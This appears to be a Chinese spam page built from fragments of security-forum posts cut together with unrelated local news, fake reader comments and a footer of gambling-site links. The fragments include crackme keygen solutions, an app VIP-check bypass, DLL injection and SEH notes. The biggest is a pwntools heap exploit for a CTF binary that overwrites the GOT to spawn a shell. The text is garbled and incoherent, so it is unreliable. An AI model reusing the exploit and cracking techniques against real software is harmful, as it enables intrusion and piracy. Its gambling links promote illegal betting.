,源码已经上传至附件(pS:r3的小玩意,只给需要的人..表哥笑笑就好自绘界面和一些小细节小方法还是比较适合MFC新手参考的,代码注释已经写得含详细了这就不贴代码了)实现功能:辣鸡清理:系统临时文件,浏览器辣鸡,浏览器cookie,内存优化,vs项目辣鸡..软件管理,系统服务,软件卸载,注册表启动项,添加和删除,病毒查杀,md5查杀,白名单查杀,全路径查杀,网络流量监控,主动防御(尽情的骂我吧..后来写着写着感觉主防太难写要稳定的hookn个函数)..内含基本ado数据库编程GDI自绘实现网络监控,有个优化的小火箭,最小化时支持程序隐藏,里面有Button类,一个Button一个类这个类继承自CButton然后用此类创建对象和Button的IDC_Button关联,然后设置Button的属性,OwnDrawer为ture,这是这些按钮的,还有一些list控件颜色,静态控件字体设置,颜色设置,还有静态控件刷新防止重影的方法,剩下的就是api用法和C++语法了....[IMG][/IMG][IMG][/IMG]Satori家族重复使用Mirai代码,包括网络扫描器,telnet密码尝试和看门狗禁用(图4)。。如今36岁的费德勒已经荣膺“费20”,可见年龄对于这位传奇巨星来说只是一个数字。随后,顾客需要在一楼西侧的鞋吧先换拖鞋,服务员会给顾客人手一个手牌(注:手牌一定要随身携带)。。我觉得现在不能算很火,但是我在剧本上,还有工作上比之前要多了很多,我还是挺开心的。  无论是吃饭、睡觉还是运动,都无时无刻不在影响基因的表达。”  据《日本经济新闻》报道,导致iPhoneX减产的原因是,欧洲、美国和中国的假日购物季iPhoneX销售低于预期,但该报没有援引消息来源。目前中国品牌已经占到了中国市场份额的九成左右。。有3处"sizeof(BloomWord)"的使用应为"sizeof(BloomWord)*8",因为我们处理的是位,而不是字节。以下是过VIP验证:grep-rinGetVipDateTasksmali\comsmali\com/example/phoneMgr//:43{"ret":"1","vipdate":"2018-12-3100:00:00"}我将vip的时间改成2018年了,这样就能通过了^^(之所有要搜"GetVipDateTask",是从logcat日志里看到的提示)问题和总结但不能自动接听,不过手动接口后,对方可以听到播放的.wav录音。16=len(sn)=:00402723calledi;:00402725cmpal,:00402727mov[esp+esi+104h+var_B4],:0040272Bjzshortloc_:0040272Daddesi,:00402730cmpesi,:00402733jlshortloc_:00402735mov[esp+esi+104h+var_B4],:0040273Aaddesi,:0040273Dcmpesi,:00402740jaloc_4029DDdes加密,其中多个常数表被替换key="*2017*10"des_cbc_encrypt(sn,key).text:00402771calldes_cbc_:0045AE9CPC1_:0045AED4LOOP_:0045AEE4PC2_:0045AF18IP_:0045AF58E_:0045AF88P_:0045AFA8IPR_:0045AFE8S_Boxsn高4位与低4位与换,转换为16进制字符串.text:004027B0pushesi....text:00402806jbshortloc_4027B0sn计算.text:00402808callmirvar....text:00402876callsub_4022E0bigx=mirvar(0);bigv=mirvar(173);bigy=mirvar(1817);bytes_to_big(len,sn,x);multiply(x,v,x);fft_mult(x,y,y);power(y,2,y);decr(y,1001,y);v=mirvar(317)multiply(y,v,y);//4022E0是用c的浮点函数计算的sn=((sn*173*1817)^2-1001)*317sn=reverse(sn)luajit计算.text:004028F0pushoffsetaLuajit210Beta3;"".text:004028F5push917h;:004028FApushoffsetbyte_45A578;:004028FFpushesi;:00402900callluaL_::::0040290AcallluaJIT_:0040290Fpush0;:00402911push0;:00402913push0;:00402915pushesi;:00402916calllua_:0040291Baddesp,:0040291Etesteax,:00402920jnzshortloc_:::00402924calllua_:00402929pushoffsetaXut;"xut".text:::00402934calllua_:00402939pushoffsetaMyst;"myst".text:::00402944calllua_:00402949push0;:0040294Bpush1;:0040294Dpush0;:0040294Fpushesi;:00402950calllua_pcall....text:00402986push0FFFFFFFFh;:00402988pushesi;:00402989calllua_:0040298Eaddesp,:00402991testeax,:00402993jzshortloc_:00402995push0FFFFFFFFh;:00402997pushesi;:00402998calllua_:0040299Daddesp,:004029A0jmpshortloc_:004029A2moveax,[esp+104h+var_F0].text:004029A6testeax,:004029A8jzshortloc_4029B1xut=snifmyst()==1thenokmyst():x=xutx+=101*1001+(10101+1001*99)*100x*=983751509373x-=1023*13+1203*13*14+1230*13*14*15+1231*13*14*15*16x=(x+1)*2expected=1574592838300862641516215149137548264158058079230003764126382984039489925466995870724568174393389905601620735902909057604303543552180706761904if(x==expected)return1elsereturn0luajit分析根据luaJIT_setmode定位到lj_dispatch_update函数从lj_dispatch_update定位到lj_vm_asm_begin与lj_bc_ofs在lj_vm_asm_begin+lj_bc_ofs[i]处下断,分析各个bytecode的功能.text:0040AFCEcalllj_dispatch_:0040ACA9movzxesi,ds:lj_bc_ofs+:0040ACB0movzxedi,ds:lj_bc_ofs+:0040ACB7movzxebp,ds:lj_bc_ofs+:0040ACBEmovzxeax,ds:lj_bc_ofs+:0040ACC5addesi,offsetlj_vm_asm_:0040ACCBaddedi,offsetlj_vm_asm_:0040ACD1addebp,offsetlj_vm_asm_:0040ACD7addeax,offsetlj_vm_asm_beginKXCTF201710BYLoudy08:0040100Dmovdword_41B034,:00401017callget_:::00401026moveax,dword_:0040102Btesteax,:0040102Djnzshortloc_:0040102FpushoffsetaYouGetIt;"Yougetit!".text:00401034callsub_:00401039addesp,:0040103Cxoreax,:0040103Eretncheck1v0!=0,v1!=0,v0!=v15*(v1-v0)+v1=0x8F503A4213*(v1-v0)+v0=0xEF503A42化简第一个等式得6*v1-5*v0=0x8F503A42,记为(1)check2v0!=0,v1!=0,v0!=v117*(v1-v0)+v1=0xF3A948837*(v1-v0)+v0=0x33A94883化简第一个等式得18*v1-17*v0=0xF3A94883,记为(2)化简(1),(2)得-2*v0=0x45B899BD,显然不成立2get_sn存在溢出,溢出修改返回地址为0x00413131,sn格式为:11112222333311Av0=0x31313131v1=0x32323232v2=0x33333333第一个验证:4*(v0-v1)+v0+v2=:004133E9subeax,0EAF917E2h第二个验证:3*(v0-v1)+v0+v2=:004135F7subeax,0E8F508C8h第三个验证:3*(v0-v1)+v0-v2=:004136D8subeax,0C0A3C68h化简得v0-v1=02040F1Av0+v2=E2E8DB7Av0-v2=05FE0F1Av0=7473754Av1=726F6630v2=6E756630Just0for0fun11A在上面的代码中,获取函数地址的部分没有具体写,上一篇帖子中详细的说明了获取的过程,差别就是上一篇帖子中需要将RVA转化为文件偏移。来源:Forcepoint安全实验室2017年10月25日本文由看雪翻译小组编译不同级别结构的格式,诸如PXE,PPE,PDE和PTE都是相似的,MMPTE不仅可以用于表示PTE,还可以表示这些其他转换结构。在平南余甘果生态园,昔日无人问津的余甘果成了抢手货。。因为对于客户端来说凡是以HTTP开头的变量都是可控的,不论是通过getenv还是通过$_SERVER方式获取。,在上面的代码中,获取函数地址的部分没有具体写,上一篇帖子中详细的说明了获取的过程,差别就是上一篇帖子中需要将RVA转化为文件偏移。,一些未文档化的结构在不同Windows版本间有所变化。  在平南走访,绿色生态是许多种养户挂在嘴边的热词。od无法调试,先使用ida静态分析,发现该程序加载驱动,patch掉驱动后再动态调试。用户在浏览器被攻陷网站时,网站会通过HTTPPOST请求打开一个URL,而弹出有含有虚假AdobeFlash更新内容的窗口。,尝试寻找原因:修改了smali但未能成功,似乎是底层限制;尝试切换最新版本(),可行。运行,OD附加前往401000,看着挺像处理代码的下断运行,输入sn后断下(运气挺好)这个应该是初始化luabytecode(看后面字符串,功能应该是xor)0040103D885C2436movbyteptrss:[esp+36],bl0040104188442437movbyteptrss:[esp+37],al00401045C644243807movbyteptrss:[esp+38],70040104A885C2439movbyteptrss:[esp+39],bl...初始化的栈信息0012FA4E0010927C0000000000001B4C4A02023B.抾......LJ;0012FA5E00020700030009360200003902010236....6..960012FA6E03000039030203120400001205010012..9...0012FA7E06010042030400430200000873756209.B.C.. string.0012FA9E00050175360100003901010112020000.u6..9..0012FAAE42010202080100005801028029010000B..X)..0012FABE4C010200360102003901030136020400L.6.96.0012FACE12030000290401004202030229037000..).B)6.96.0012FAEE12040000290502004203030229046500..).B)6.96.0012FB0E12050000290603004204030229056400..).B)6.96.0012FB2E12060000290704004205030229066900..).B)6.96.0012FB4E12070000290805004206030229077900..).B)6.96.0012FB6E12080000290906004207030229083100..)..B)6.96.0012FB8E12090000290A07004208030229093200...)..B).6.96..0012FBAE120A0000290B080042090302290A3300...) .B.).6..9..6..0012FBCE120B0000290C0900420A0302290B3400 ..)...B.) 6..9..6 .0012FBEE120C0000290D0A00420B0302290C3500...)...B ).6 .9  6..0012FC0E120D0000290E0B00420C0302290D3600...) .B.). 6..9..6..0012FC2E120E0000290F0C00420D0302290E3700..)..B.)....0012FC4E12100400121105001212060012130700....0012FC5E121408001215090012160A0012170B00..... .0012FC6E12180C004A0D0D000762790962786F72..J...bitlen string0012FC8E3D030002000600083600000027010100=...6....0012FC9E42000201330002003700030033000400B.3..7..3..0012FCAE370005004B000100096D61696E0007627..K...main.b0012FCBE7900086269740C726571756972650002y.0012FCCE0000FE55F9EAEBD15D00313233343536..㑳胙].1234560012FCDE00000000000000000000000000000000................0012FCEE00000000000000000000000000000000................0012FCFE00000000000000000000000000000000................lua初始化,43Cleaeax,dwordptrss:[esp+3C],380040220E85C0testeax,每个字符(恩,虽然是猜的,但是后面证明猜对了)lua_xor(sn[i])xor05120A2942417561358355940040222C55pushebp00,eax004022376AF5push-0B0040223956pushesi0040223A83F705xoredi,,eax004022446AF6push-0A0040224656pushesi0040224783F312xorebx,,eax004022516AF7push-90040225356pushesi0040225483F50Axorebp,,290040225F6AF8push-80040226156pushesi0040226289442458movdwordptrss:[esp+58],,420040226E6AF9push-70040227056pushesi0040227189442448movdwordptrss:[esp+48],,410040227D6AFApush-60040227F56pushesi0040228089442460movdwordptrss:[esp+60],,750040228C6AFBpush-50040228E56pushesi0040228F89442460movdwordptrss:[esp+60],,400040229B83F061xoreax,610040229E6AFCpush-4004022A056pushesi004022A189442418movdwordptrss:[esp+18],,35004022AD6AFDpush-3004022AF56pushesi004022B089442424movdwordptrss:[esp+24],,83004022BE6AFEpush-2004022C056pushesi004022C189442434movdwordptrss:[esp+34],,55004022CD6AFFpush-1004022CF56pushesi004022D089442444movdwordptrss:[esp+44],,94结果必须为:18161E2F4811213733865294004022F383FF18cmpedi,18004022F67554jnzshort0040234C004022F883FB16cmpebx,16004022FB754Fjnzshort0040234C004022FD83FD1Ecmpebp,1E00402300754Ajnzshort0040234C00402302837C24302Fcmpdwordptr[esp+30],2F004023077543jnzshort0040234C00402309837C241848cmpdwordptr[esp+18],480040230E753Cjnzshort0040234C00402310837C242811cmpdwordptr[esp+28],11004023157535jnzshort0040234C00402317837C242021cmpdwordptr[esp+20],210040231C752Ejnzshort0040234C0040231E837C241037cmpdwordptr[esp+10],37004023237527jnzshort0040234C00402325837C241433cmpdwordptr[esp+14],330040232A7520jnzshort0040234C0040232C817C241C86000cmpdwordptr[esp+1C],86004023347516jnzshort0040234C00402336837C242452cmpdwordptr[esp+24],520040233B750Fjnzshort0040234C0040233D817C242C94000cmpdwordptr[esp+2C],94004023457505jnzshort0040234C004023478D47E9leaeax,dwordptr[edi-17]0040234AEB02jmpshort0040234E0040234C33C0xoreax,eax没看lua代码,直接试了下voidtest(){BYTEkey1[12];//123456789012BYTEbuf1[12]={0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x30,0x31,0x32};//call00412CE0的结果BYTEbuf2[12]={0x41,0x57,0x57,0x5D,0x4C,0x07,0x05,0x0B,0x0D,0x05,0x07,0x05};BYTEkey2[12]={0x05,0x12,0x0A,0x29,0x42,0x41,0x75,0x61,0x35,0x83,0x55,0x94};BYTEexpected[12]={0x18,0x16,0x1E,0x2F,0x48,0x11,0x21,0x37,0x33,0x86,0x52,0x94};for(inti=0;i12;i++){key1[i]=buf1[i]^buf2[i];}BYTEsn[13]={0};for(inti=0;i12;i++){sn[i]=key1[i]^key2[i]^expected[i];}printf(%s,sn);}maposafe2017和遗传基因有点像,“迷因”也经由复制(模仿)、变异与选择的过程而演化。。

阅读(165) | 评论(342) | 转发(720) |

上一篇:www.vns773311.com

下一篇:www.v8983.com

给主人留下些什么吧!~~

段怀然2018-8-14

李燊目前,香港华润、台湾水泥集团、印尼爱凯尔集团、中国华电、北京华联、南宁梦之岛、南宁百货、苏宁电器等一大批国内外知名企业都看好贵港的发展前景,纷纷抢占贵港的发展先机,在贵港投资兴办实业,都获得了丰厚的回报。

  李新元要求,要多方联动,形成推进工作的强大合力。如此初步分析后,我想还是得看一下软件实际的运行效果(没有直接运行是怕这种软件不安全,勒索软件太可怕啊。。每个共享的中断向量的IDT条目都指向了第一个KINTERRUPT结构体,其他的KINTERRUPT结构体通过字段InterruptListEntry形成链。各级河长要时刻把河长巡河工作放在心上,坚持长短结合、综合治理、分类施策,有针对性地解决污染问题,把治水护水的思想认识提升到打造美丽贵港的高度上来。,1.处理逻辑name是内置的:readyucode是输入的int__cdeclsub_40AEF0(HWNDhDlg){...GetDlgItemTextA(hDlg,1000,name,64);v1=GetDlgItemTextA(hDlg,1001,code,256);v2=v1;if(v1=0x21){if(code[0]!=0x30){v3=0;if(v1=0){LABEL_9:memset(byte_41BC84,0,sizeof(byte_41BC84));v5=off_418078[check(code,name)];MessageBoxA(hDlg,v5,v5,0);return0;}while(1){v4=code[v3];if(!isxdigit(v4)||islower(v4))break;if(++v3=v2)gotoLABEL_9;}}...}z=10000000000000000000000000000000000000000000000000000000000000000079r=code^5modzr有34字节,前17字节作为x,后17字节作为yepInput=(x,y)根据name计算3个md5值:md0=md5(\x01readyu-pediy)=51C75F1F444BAA97ED18DD6C340835D7md1=md5(\x02\x02readyu-2017)=0E5CF7F068D6EFA16F42F935EC424A75md2=md5(\x03\x03\x03readyu-crackme)=A4CD1D64486ABDE1BE441944460CD41D椭圆曲线:m=131,a=13,b=2,c=1,a2=0,a6=1前面的epInput是这个曲线上的点ep1=(51C99BFA6F18DE467C80C23B98C7994AA,42EA2D112ECEC71FCF7E000D7EFC978BD)ep2=(6C997F3E7F2C66A4A5D2FDA13756A37B1,4A38D11829D32D347BD0C0F584D546E9A)n=200000000000000004D4FDD5703A3F269校验(md2*ep1+epInput)*md0modn==(md2*ep2+epInput)*md1modnsignedint__cdeclcheck(char*code,constchar*a2){...get_mip();v29[0]=0;memset(v29[1],0,0x20u);*(_WORD*)v29[33]=0;v29[35]=0;ptr[0]=0x10;ptr[1]=0;ptr[2]=0;ptr[3]=0;ptr[4]=0;ptr[5]=0;ptr[6]=0;ptr[7]=0;ptr[8]=0;ptr[9]=0;ptr[10]=0;ptr[11]=0;ptr[12]=0;ptr[13]=0;ptr[14]=0;ptr[15]=0;ptr[16]=0;ptr[17]=0;ptr[18]=0;ptr[19]=0;ptr[20]=0;ptr[21]=0;ptr[22]=0;ptr[23]=0;ptr[24]=0;ptr[25]=0;ptr[26]=0;ptr[27]=0;ptr[28]=0;ptr[29]=0;ptr[30]=0;ptr[31]=0;ptr[32]=0;ptr[33]=0x79;mirsys_init();v2=z;a2_1=::a2;v4=::x;y=dword_41BC68;x=dword_41BC64;a6=dword_41BC70;w=dword_41BC74;bytes_to_big(34,ptr,z);cinstr(v4,code);if(mr_compare(v4,v2)=0){power(v4,5,v2,w);memset(v29,0,sizeof(v29));if(big_to_bytes(34,w,v29,1)==34){bytes_to_big(17,v29,x);bytes_to_big(17,v29[17],y);convert(0,a2_1);convert(1,a6);v17=1;if(ecurve2_init(131,13,2,1,a2_1,a6,0,0)){qmemcpy(v46,51C99BFA6F18DE467C80C23B98C7994AA,sizeof(v46));qmemcpy(v47,42EA2D112ECEC71FCF7E000D7EFC978BD,sizeof(v47));qmemcpy(v44,6C997F3E7F2C66A4A5D2FDA13756A37B1,sizeof(v44));qmemcpy(v43,4A38D11829D32D347BD0C0F584D546E9A,sizeof(v43));qmemcpy(v45,200000000000000004D4FDD5703A3F269,sizeof(v45));v30=dword_418118;v31=word_41811C;memset(v32,0,sizeof(v32));v33=0;v34=dword_4180E4;v35=byte_4180E8;memset(v36,0,sizeof(v36));v37=0;v38=0;v40=dword_4180F0;v39=dword_4180EC;memset(v41,0,sizeof(v41));a1=0;memset(v49,0,sizeof(v49));v50=0;v51=0;i=0;v6=a1;a3=(char*)mds;lpMem=(flash)v30;do{strcpy(v6,a2);strcat(v6,-);strcat(v6,(constchar*)lpMem);xmd5(v6,strlen(v6),a3,i+1);v6+=256;++i;lpMem+=4;a3+=16;}while(i3);md0=mirvar(0);md1=mirvar(0);md2=mirvar(0);x1=mirvar(0);a3a=mirvar(0);x2=mirvar(0);lpMema=mirvar(0);v9=mirvar(0);ep1=epoint_init();ep2=epoint_init();p1=epoint_init();p2=epoint_init();epInput=epoint_init();if(epoint2_set(x,y,0,epInput)){cinstr(x1,v46);cinstr(a3a,v47);epoint2_set(x1,a3a,0,ep1);cinstr(x2,v44);cinstr(lpMema,v43);epoint2_set(x2,lpMema,0,ep2);bytes_to_big(16,(_BYTE*)mds,md0);bytes_to_big(16,mds[1],md1);bytes_to_big(16,mds[2],md2);ecurve2_mult(md2,ep1,p1);ecurve2_mult(md2,ep2,p2);ecurve2_add(epInput,p1);ecurve2_add(epInput,p2);ecurve2_mult(md0,p1,p1);ecurve2_mult(md1,p2,p2);epoint2_get(p1,x1,a3a);epoint2_get(p2,x2,lpMema);cinstr(v9,v45);divide(x1,v9,v9);divide(x2,v9,v9);v17=3;if(!mr_compare(x1,x2))v17=0;}else{v17=2;}mirkill(md0);mirkill(md1);mirkill(md2);mirkill(x1);mirkill(x2);mirkill(a3a);mirkill(lpMema);mirkill(v9);epoint_free(ep1);epoint_free(ep2);epoint_free(p1);epoint_free(p2);epoint_free(epInput);}mirexit();result=v17;}else{mirexit();result=1;}}else{mirexit();result=1;}returnresult;}2.计算(md2*ep1+epInput)*md0modn==(md2*ep2+epInput)*md1modn=epInput=(md2*md1*ep2-md2*md0*ep1)*(((md0-md1)^-1)modn)得到(02D23461BA71B50AF182DC76E5A7C726F5,07BE013AF19BD185BCD20BB341EA31298B)voidtest2(){biga2=mirvar(0);biga6=mirvar(1);if(ecurve2_init(131,13,2,1,a2,a6,0,0)){epoint*epInput=epoint_init();bigx=mirvar(0);bigy=mirvar(0);bigmd0=mirvar(0);bigmd1=mirvar(0);bigmd2=mirvar(0);cinstr(md0,51C75F1F444BAA97ED18DD6C340835D7);cinstr(md1,0E5CF7F068D6EFA16F42F935EC424A75);cinstr(md2,A4CD1D64486ABDE1BE441944460CD41D);epoint*p1=epoint_init();bigx1=mirvar(0);bigy1=mirvar(0);cinstr(x1,51C99BFA6F18DE467C80C23B98C7994AA);cinstr(y1,42EA2D112ECEC71FCF7E000D7EFC978BD);epoint2_set(x1,y1,0,p1);epoint*p2=epoint_init();bigx2=mirvar(0);bigy2=mirvar(0);cinstr(x2,6C997F3E7F2C66A4A5D2FDA13756A37B1);cinstr(y2,4A38D11829D32D347BD0C0F584D546E9A);epoint2_set(x2,y2,0,p2);bign=mirvar(0);cinstr(n,200000000000000004D4FDD5703A3F269);ecurve2_mult(md2,p2,p2);ecurve2_mult(md1,p2,p2);ecurve2_mult(md2,p1,p1);ecurve2_mult(md0,p1,p1);ecurve2_sub(p1,p2);bigr=mirvar(0);bigrd=mirvar(0);bignd=mirvar(0);bigz=mirvar(0);subtract(md0,md1,r);xgcd(r,n,rd,nd,z);ecurve2_mult(rd,p2,epInput);epoint2_get(epInput,x,y);charsx[256];charsy[256];cotstr(x,sx);cotstr(y,sy);printf(%s,sx);printf(%s,sy);}}用RDLP计算得到code7A7102F36F3B344D666132A6FF7EF4BA05B99640BB815C9E712A72C64B6ABC582C2。

李文净2018-8-14 14:40:36

Arch:amd64-64-littleRELRO:PartialRELROStack:CanaryfoundNX:NXenabledPIE:PIEenabled1:newbox1~box52:deletefree完之后没有修改in_use标志,可以多次free,存在UAF,只有box2和box3可以free3:edit4:print5:guessseed=seed;srand((unignedint)seed);v=rand();if(input()==v)printseed;elseprintv;解题思路我这个解法好像有点麻烦,等结束后学习下标准解法是什么样的..leakprocessbase,leaklibcbase,overwritegot,getshelltest_####*seed=0;intmain(){seed=seed;srand(*(unsignedint*)seed);printf("%p",seed);printf("0x%x",rand());return0;}guess_####*seed=0;intmain(intargc,char**argv){intlow3=atoi(argv[1]);intr=atoi(argv[2]);unsignedintseed;unsignedinti;for(i=0;i=0xFFFFF;i++){seed=i12;seed+=low3;srand(seed);if(rand()==r){printf("0x%x",rand());return0;}}printf("end");return0;}###=Truefrompwnimport*importsyscontext(arch=amd64,kernel=amd64,os=linux)#_level=debugelf=ELF(./club)ifargs[LOCAL]:libc_path=/lib/x86_64-linux-gnu/io=process(./club)("processbase:"+hex(()[/root/Desktop/test/pediy_pwn/club]))("processlibc_base:"+hex(()[libc_path]))else:libc_path=./io=remote(,8888)libc=ELF(libc_path)defcmd_new(index,size):()(1)()(str(index))()(str(size))()returndefcmd_delete(index):()(2)()(str(index))returndefcmd_edit(index,buf):()(3)()(str(index))(buf)returndefcmd_print(index):()(4)()(str(index))data=()returndatadefcmd_guess_wrong(v):()(5)()(str(v))(Thenumberis)data=(!)[:-1]returndatadefcmd_guess_right(v):()(5)()(str(v))(Yougetasecret:)data=(!)[:-1]returndatadefcmd_quit(name):()(6)()(name)()returndefexploit():#leakprocessbasev=cmd_guess_wrong(0)p_guess=process([./guess_seed,str(0x148),v])guess_r=p_()#printguess_rseed=cmd_guess_right(int(guess_r,16))#printhex(int(v))process_base=int(seed)-("leakedprocessbase:"+hex(process_base))#(io)#input()#triggercoaleace#usebox4toeditbox2box3len2=0x1A0len3=0x1F0cmd_new(2,len2)cmd_edit(2,A*len2)cmd_new(3,len3)cmd_delete(2)cmd_delete(3)cmd_new(4,len2+len3)data=cmd_print(4)[:6]libc_main_arena_top=0x3C4B78libc_base=u64((8,\x00))-libc_main_arena_topprint(leakedlibc_base:%x%libc_base)#createafakefreechunkinsidebox2beforebox3box2_ptr=process_base+0x202110print(box2_ptr:%x%box2_ptr)buf=buf+=p64(0)+p64(len2+1)+p64(box2_ptr-0x18)+p64(box2_ptr-0x10)buf+=A*(len2-0x20)buf+=p64(len2)buf+=p64(len3)cmd_edit(4,buf)cmd_delete(3)#box2_ptr-0x18writtentobox2_ptrcmd_edit(3,/bin/sh\x00)#[box2]=got_freebuf=buf+=p64(0)buf+=p64(0)#box0buf+=p64(0)#box1buf+=p64(process_base+[free])cmd_edit(2,buf)#[got_free]=systembuf=buf+=p64(libc_base+[system])cmd_edit(2,buf)#system(/bin/sh)cmd_delete(3)()returnexploit(),通过上述分析,我们只需将“JPyjup3eCyJjlkV6DmSmGHQ=”base64解码再rc4解密,即是sn使用在线rc4解密并有base64编码功能的,进行解密:sn=madebyericky94528。贵港城北新区广西贵港市是一座具有两千多年历史的古郡,又是一个充满生机的新兴内河港口城市。。

李志强2018-8-14 14:40:36

调试器命令!pte可以显示给定虚拟地址的所有级别的页表内容。,通过GDIObjDump项目页[6]下载它们。。示范区负责人说:“我们主打生态循环农业,用工及化肥、农药投入少了,产量品质却上去了。。

刘艳丽2018-8-14 14:40:36

所以这也告诫我们的程序员,很多时候直接从网上搜索的代码是不安全的,程序员们在参考网上代码时最好是对代码进行分析,代码不仅仅只是为了实现功能,还要注重安全。,原话如下:MYSQL中utf8_unicode_ci和utf8_general_ci两种编码格式,utf8_general_ci不区分大小写,=A,=O,ü=U这三种条件都成立,对于utf8_general_ci下面的等式成立:=s,但是,对于utf8_unicode_ci下面等式才成立:=ss所以在将mysql的编码设置为utf-8的时候,=A,=O,ü=U,,左右两边的字符是可以相互替换的。。但是如果Client-Ip和X-Forwarded-For存在值就能够保证触发漏洞了,这种漏洞主要是出现在cms中的sql注入中。。

王宗正2018-8-14 14:40:36

Payload:要注入的DLL在网上搜索了一些关于DLL注入的资料,发现都没有被注入的DLL的实现,这里首先占用少量篇幅来说明DLL的实现。,关闭优化选项,dep,aslr,safeseh(vs项目属性选择配置属性-链接器-命令行填写“/SAFESEH:NO”)我们可以试试如果和上次一样覆盖掉返回地址当执行到Security_Check_Cookie的时候,他会检查栈Cookies和.data的副本,这时候GS就分发系统异常处理请求然后就由系统接管处理你这个异常我们可以先用mona插件查看程序当前seh链表这个地址指向的就是PointertonextSEHrecord下面的SEhander是ntdll中的系统接管处理。。启动仪式上,贵港市委书记李新元向“970水蜜桃女主播”赠送荷花展吉祥物“和和”、“田田”,并为其进行代言授牌。。

石方2018-8-14 14:40:36

但这个样本有明显的特征:解析PE结构,所以当我们遇到这种样本的时候,可以考虑为反射式DLL注入。,已经被复制过的实时对象被认为是中间generation的一部分,并被提升到老generation。。GetReflectiveLoaderOffsetF5后的代码从图中可以看到,有大量调用同一个函数的情况,并且有字符串比较。。

评论热议
请登录后评论。

登录 注册

现金牛牛 网上赌博 现金棋牌评测网 真钱捕鱼游戏 真钱棋牌 真钱二八杠
www.868337.com www.8611msc.com www.2220999.com www.hg778805.com www.yh78905.com www.628499.com
www.tyc383.com www.hg881355.com 现金二八杠 www.446622.com www.119097.com www.hg4476.com
www.vns49988.com www.hg490.com www.xj8688.com www.hg69788.com www.bj3040.com www.2332275.com